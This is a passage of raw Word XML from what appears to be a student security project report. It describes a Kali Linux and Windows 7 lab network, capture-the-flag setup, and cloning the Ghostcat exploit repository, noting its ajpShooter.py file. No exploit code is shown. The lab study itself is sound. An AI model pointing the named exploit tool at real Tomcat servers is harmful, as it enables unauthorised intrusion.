          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="413F1811" wp14:editId="66BAC325">
            <wp:extent cx="3765771" cy="3102401"/>
            <wp:effectExtent l="19050" t="19050" r="25400" b="22225"/>
            <wp:docPr id="25" name="Picture 2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application&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId77"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3771335" cy="3106985"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:solidFill>
                        <a:schemeClr val="accent1"/>
                      </a:solidFill>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="367F418B" w14:textId="205F86F4" w:rsidR="00A71245" w:rsidRDefault="00A71245" w:rsidP="00A71245">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
      </w:pPr>
      <w:bookmarkStart w:id="276" w:name="_Toc111363625"/>
      <w:bookmarkStart w:id="277" w:name="_Toc111363762"/>
      <w:bookmarkStart w:id="278" w:name="_Toc111981786"/>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Figure \* ARABIC ">
        <w:r w:rsidR="005507EE">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>61</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t>: Kali Linux Network Setup</w:t>
      </w:r>
      <w:bookmarkEnd w:id="276"/>
      <w:bookmarkEnd w:id="277"/>
      <w:bookmarkEnd w:id="278"/>
    </w:p>
    <w:p w14:paraId="1EF69F74" w14:textId="77777777" w:rsidR="00BC61F9" w:rsidRDefault="00BC61F9" w:rsidP="00BC61F9">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="218B328D" w14:textId="2427FE77" w:rsidR="00AA3505" w:rsidRDefault="00C23597" w:rsidP="00BC61F9">
      <w:pPr>
        <w:ind w:left="851"/>
      </w:pPr>
      <w:r>
        <w:t>The IP addresses were found using i</w:t>
      </w:r>
      <w:r w:rsidR="00AA3505">
        <w:t>pconfig and ifconfig on</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> the</w:t>
      </w:r>
      <w:r w:rsidR="00AA3505">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Windows and </w:t>
      </w:r>
      <w:r w:rsidR="00AA3505">
        <w:t xml:space="preserve">Kali Linux </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">machines </w:t>
      </w:r>
      <w:r w:rsidR="00AA3505">
        <w:t>respectively</w:t>
      </w:r>
      <w:r>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00AA3505">
        <w:t xml:space="preserve"> set out in figures </w:t>
      </w:r>
      <w:r w:rsidR="00DA460C">
        <w:t>62</w:t>
      </w:r>
      <w:r w:rsidR="00AA3505">
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidR="00DA460C">
        <w:t>63</w:t>
      </w:r>
      <w:r w:rsidR="00AA3505">
        <w:t xml:space="preserve">. The IP address for the </w:t>
      </w:r>
      <w:r w:rsidR="00C21CFE">
        <w:t>W</w:t>
      </w:r>
      <w:r w:rsidR="00AA3505">
        <w:t>indows system is 192.168.1.10 and the IP address for the Kali Linux machine i</w:t>
      </w:r>
      <w:r>
        <w:t>s</w:t>
      </w:r>
      <w:r w:rsidR="00AA3505">
        <w:t xml:space="preserve"> 192.168.1.11.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67D6ACD5" w14:textId="56387152" w:rsidR="004E291C" w:rsidRDefault="00C23597" w:rsidP="00714DB5">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00C23597">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4E604323" wp14:editId="4376AF10">
            <wp:extent cx="4681463" cy="3453266"/>
            <wp:effectExtent l="0" t="0" r="5080" b="0"/>
            <wp:docPr id="46" name="Picture 4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Text&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId78"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4687114" cy="3457435"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E32A391" w14:textId="44968585" w:rsidR="00714DB5" w:rsidRDefault="00714DB5" w:rsidP="00714DB5">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
      </w:pPr>
      <w:bookmarkStart w:id="279" w:name="_Toc111363626"/>
      <w:bookmarkStart w:id="280" w:name="_Toc111363763"/>
      <w:bookmarkStart w:id="281" w:name="_Toc111981787"/>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Figure \* ARABIC ">
        <w:r w:rsidR="005507EE">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>62</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t>: IP Address for Windows 7</w:t>
      </w:r>
      <w:bookmarkEnd w:id="279"/>
      <w:bookmarkEnd w:id="280"/>
      <w:bookmarkEnd w:id="281"/>
    </w:p>
    <w:p w14:paraId="7B75F3AD" w14:textId="703B72ED" w:rsidR="0003446D" w:rsidRDefault="0003446D" w:rsidP="00C23597">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="0003446D">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="73CBE104" wp14:editId="3CA3BAA0">
            <wp:extent cx="4577666" cy="3267986"/>
            <wp:effectExtent l="0" t="0" r="0" b="8890"/>
            <wp:docPr id="30" name="Picture 3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ext&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId79"/>
                    <a:srcRect b="11390"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4580438" cy="3269965"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="33B4D008" w14:textId="0AE59685" w:rsidR="00C23597" w:rsidRDefault="00C23597" w:rsidP="00C23597">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
      </w:pPr>
      <w:bookmarkStart w:id="282" w:name="_Toc111363627"/>
      <w:bookmarkStart w:id="283" w:name="_Toc111363764"/>
      <w:bookmarkStart w:id="284" w:name="_Toc111981788"/>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Figure \* ARABIC ">
        <w:r w:rsidR="005507EE">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>63</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t>: IP address for Kali Linux</w:t>
      </w:r>
      <w:bookmarkEnd w:id="282"/>
      <w:bookmarkEnd w:id="283"/>
      <w:bookmarkEnd w:id="284"/>
    </w:p>
    <w:p w14:paraId="6CF27002" w14:textId="77777777" w:rsidR="00C23597" w:rsidRPr="00C23597" w:rsidRDefault="00C23597" w:rsidP="00C23597"/>
    <w:p w14:paraId="0887552A" w14:textId="16C67BC2" w:rsidR="00203432" w:rsidRDefault="00203432" w:rsidP="00BC61F9">
      <w:pPr>
        <w:ind w:left="851"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">An example of the two flags that were to be captured during the experiment are set out in figure </w:t>
      </w:r>
      <w:r w:rsidR="00DA460C">
        <w:t>64.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E7B0E20" w14:textId="07990894" w:rsidR="00793080" w:rsidRDefault="00793080" w:rsidP="00793080">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="30364512" wp14:editId="0780D753">
            <wp:extent cx="4683318" cy="3586952"/>
            <wp:effectExtent l="0" t="0" r="317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0">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:srcRect t="3985"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4687884" cy="3590449"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="14EABB9B" w14:textId="63D97A6A" w:rsidR="00793080" w:rsidRDefault="00793080" w:rsidP="00793080">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
      </w:pPr>
      <w:bookmarkStart w:id="285" w:name="_Toc111363628"/>
      <w:bookmarkStart w:id="286" w:name="_Toc111363765"/>
      <w:bookmarkStart w:id="287" w:name="_Toc111981789"/>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Figure \* ARABIC ">
        <w:r w:rsidR="005507EE">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>64</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t>: Creation of Flag 2</w:t>
      </w:r>
      <w:bookmarkEnd w:id="285"/>
      <w:bookmarkEnd w:id="286"/>
      <w:bookmarkEnd w:id="287"/>
    </w:p>
    <w:p w14:paraId="3195AA8A" w14:textId="19D1B809" w:rsidR="00807B57" w:rsidRDefault="00807B57" w:rsidP="00807B57"/>
    <w:p w14:paraId="1D8E0245" w14:textId="6D88942E" w:rsidR="000009B2" w:rsidRDefault="000009B2" w:rsidP="00807B57">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">To test the connectivity of the two machines the ‘ping’ command was issued on the Windows command line and was successful as outlined in figure </w:t>
      </w:r>
      <w:r w:rsidR="00DA460C">
        <w:t>65</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69FE22C2" w14:textId="4347BEE9" w:rsidR="000009B2" w:rsidRDefault="000009B2" w:rsidP="000009B2">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="000009B2">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0AEB9B5F" wp14:editId="236A3CD4">
            <wp:extent cx="4236720" cy="2111322"/>
            <wp:effectExtent l="0" t="0" r="0" b="3810"/>
            <wp:docPr id="760259224" name="Picture 76025922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24" name="Picture 760259224" descr="A picture containing text&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId81"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4243219" cy="2114561"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3273D8CC" w14:textId="4D0DA938" w:rsidR="000009B2" w:rsidRDefault="000009B2" w:rsidP="000009B2">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
      </w:pPr>
      <w:bookmarkStart w:id="288" w:name="_Toc111363629"/>
      <w:bookmarkStart w:id="289" w:name="_Toc111363766"/>
      <w:bookmarkStart w:id="290" w:name="_Toc111981790"/>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Figure \* ARABIC ">
        <w:r w:rsidR="005507EE">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>65</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t>: Ping command used to test connectivity</w:t>
      </w:r>
      <w:bookmarkEnd w:id="288"/>
      <w:bookmarkEnd w:id="289"/>
      <w:bookmarkEnd w:id="290"/>
    </w:p>
    <w:p w14:paraId="69AC9296" w14:textId="77A56CFC" w:rsidR="00807B57" w:rsidRDefault="00807B57" w:rsidP="00807B57"/>
    <w:p w14:paraId="2052F9AF" w14:textId="37B8913B" w:rsidR="00C8706B" w:rsidRDefault="00C8706B" w:rsidP="00C8706B">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:bookmarkStart w:id="291" w:name="_Toc113190747"/>
      <w:r>
        <w:t>4.4.8</w:t>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>GhostCat Setup</w:t>
      </w:r>
      <w:bookmarkEnd w:id="291"/>
    </w:p>
    <w:p w14:paraId="5CF32C91" w14:textId="263BAB13" w:rsidR="00C8706B" w:rsidRPr="00366E14" w:rsidRDefault="00C8706B" w:rsidP="00C8706B">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
        <w:ind w:left="851" w:hanging="851"/>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:tab/>
        <w:t>Ghostcat (00theway) was cloned from the Github repository as set out in figure 66.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78018C9E" w14:textId="77777777" w:rsidR="00C8706B" w:rsidRDefault="00C8706B" w:rsidP="00C8706B">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251907072" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="47D3F86B" wp14:editId="29EDE9A1">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>2213740</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>10160</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="4111689" cy="155511"/>
                <wp:effectExtent l="19050" t="19050" r="22225" b="16510"/>
                <wp:wrapNone/>
                <wp:docPr id="760259214" name="Rectangle 760259214"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="4111689" cy="155511"/>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E73A2F" id="Rectangle 760259214" o:spid="_x0000_s1026" style="position:absolute;margin-left:174.3pt;margin-top:.8pt;width:323.75pt;height:12.25pt;z-index:251907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" filled="f" strokecolor="#c00000" strokeweight="2.25pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidRPr="00366E14">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:noProof/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="27288747" wp14:editId="58DA74B3">
            <wp:extent cx="6333487" cy="1094740"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="294847900" name="Picture 29484790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847900" name="Picture 294847900" descr="Text&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId82"/>
                    <a:srcRect l="586" r="-1"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6358399" cy="1099046"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E7C7059" w14:textId="4A1F359A" w:rsidR="00C8706B" w:rsidRDefault="00C8706B" w:rsidP="00C8706B">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:rFonts w:ascii="Georgia" w:hAnsi="Georgia"/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="292" w:name="_Toc111363663"/>
      <w:bookmarkStart w:id="293" w:name="_Toc111363800"/>
      <w:bookmarkStart w:id="294" w:name="_Toc111981791"/>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Figure \* ARABIC ">
        <w:r w:rsidR="005507EE">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>66</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t xml:space="preserve">: Clone Ghostcat from Github Repository </w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:rPr>
            <w:i w:val="0"/>
            <w:color w:val="000000"/>
          </w:rPr>
          <w:tag w:val="MENDELEY_CITATION_v3_eyJjaXRhdGlvbklEIjoiTUVOREVMRVlfQ0lUQVRJT05fZDIzYTg5NjEtNzFjMi00MGY4LTlmMTUtMzIzZGY0MTE5M2U5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1275783071"/>
          <w:placeholder>
            <w:docPart w:val="A159E37B19E84BE9948676D77F6C508A"/>
          </w:placeholder>
        </w:sdtPr>
        <w:sdtContent>
          <w:r w:rsidRPr="00663E33">
            <w:rPr>
              <w:i w:val="0"/>
              <w:color w:val="000000"/>
            </w:rPr>
            <w:t>[55]</w:t>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:bookmarkEnd w:id="292"/>
      <w:bookmarkEnd w:id="293"/>
      <w:bookmarkEnd w:id="294"/>
    </w:p>
    <w:p w14:paraId="36EEF65A" w14:textId="77777777" w:rsidR="00C8706B" w:rsidRDefault="00C8706B" w:rsidP="00C8706B">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="086DA374" w14:textId="2072CF75" w:rsidR="00C8706B" w:rsidRDefault="00C8706B" w:rsidP="00C8706B">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
        <w:ind w:left="851"/>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>The command ‘cd’ was used to change directory to Ghostcat and ‘ls’ given to see what files were listed, paying particular attention to the ajpShooter.py file (figure 67).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71245AED" w14:textId="77777777" w:rsidR="00C8706B" w:rsidRDefault="00C8706B" w:rsidP="00C8706B">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00366E14">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:noProof/>
          <w:color w:val="292929"/>
          <w:spacing w:val="-1"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4FBBE2EC" wp14:editId="75FD6726">
            <wp:extent cx="5731510" cy="1943735"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="294847902" name="Picture 29484790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847902" name="Picture 294847902" descr="Text&#10;&#10;Description automatically generated"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId83"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="1943735"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AC1225F" w14:textId="0BCB9EC5" w:rsidR="00C8706B" w:rsidRDefault="00C8706B" w:rsidP="00C8706B">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
      </w:pPr>
      <w:bookmarkStart w:id="295" w:name="_Toc111363664"/>
      <w:bookmarkStart w:id="296" w:name="_Toc111363801"/>
      <w:bookmarkStart w:id="297" w:name="_Toc111981792"/>
      <w:r>
        <w:t xml:space="preserve">Figure </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Figure \* ARABIC ">
        <w:r w:rsidR="005507EE">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>67</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t xml:space="preserve">: List files in Ghostcat Directory </w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:rPr>
            <w:i w:val="0"/>
            <w:color w:val="000000"/>
          </w:rPr>
          <w:tag w:val="MENDELEY_CITATION_v3_eyJjaXRhdGlvbklEIjoiTUVOREVMRVlfQ0lUQVRJT05fZDdmYTk4MjAtMzMyMC00YzRhLWIwY2MtOWIyOTMxOTJiNWNh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2018223968"/>
          <w:placeholder>
            <w:docPart w:val="E1A9EBE287E4470DA73B937AA658F493"/>
          </w:placeholder>
        </w:sdtPr>
        <w:sdtContent>
          <w:r w:rsidRPr="00663E33">
            <w:rPr>
              <w:i w:val="0"/>
              <w:color w:val="000000"/>
            </w:rPr>
            <w:t>[55]</w:t>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:bookmarkEnd w:id="295"/>
      <w:bookmarkEnd w:id="296"/>
      <w:bookmarkEnd w:id="297"/>
    </w:p>
    <w:p w14:paraId="7E505C1E" w14:textId="77777777" w:rsidR="00C8706B" w:rsidRPr="00AE0FA7" w:rsidRDefault="00C8706B" w:rsidP="00C8706B">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="235D17EA" w14:textId="3A470661" w:rsidR="00DF42B8" w:rsidRDefault="000E7253" w:rsidP="00991450">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
      </w:pPr>
      <w:bookmarkStart w:id="298" w:name="_Toc113190748"/>
      <w:r>
        <w:t>4.</w:t>
      </w:r>
      <w:r w:rsidR="007979E4">
        <w:t>5</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="0067301D">
        <w:t>Design</w:t>
      </w:r>
      <w:r w:rsidR="00807B57">
        <w:t xml:space="preserve"> and Implementation</w:t>
      </w:r>
      <w:r w:rsidR="0067301D">
        <w:t xml:space="preserve"> Conclusion</w:t>
      </w:r>
      <w:bookmarkEnd w:id="298"/>
    </w:p>
    <w:p w14:paraId="3B83B41F" w14:textId="6B16907E" w:rsidR="00DF42B8" w:rsidRDefault="00DF42B8" w:rsidP="00991450">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="851"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">This chapter has set out how the project was designed to solve the problem faced by an organisation regarding its security. The design laid out the steps that </w:t>
      </w:r>
      <w:r w:rsidR="000009B2">
        <w:t>were</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> taken to achieve the aim of the project</w:t>
      </w:r>
      <w:r w:rsidR="000009B2">
        <w:t xml:space="preserve">. The design was successfully implemented and was now ready for the experiments to be conducted, </w:t>
      </w:r>
      <w:r>
        <w:t>covered in detail in the next chapter.</w:t>
      </w:r>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
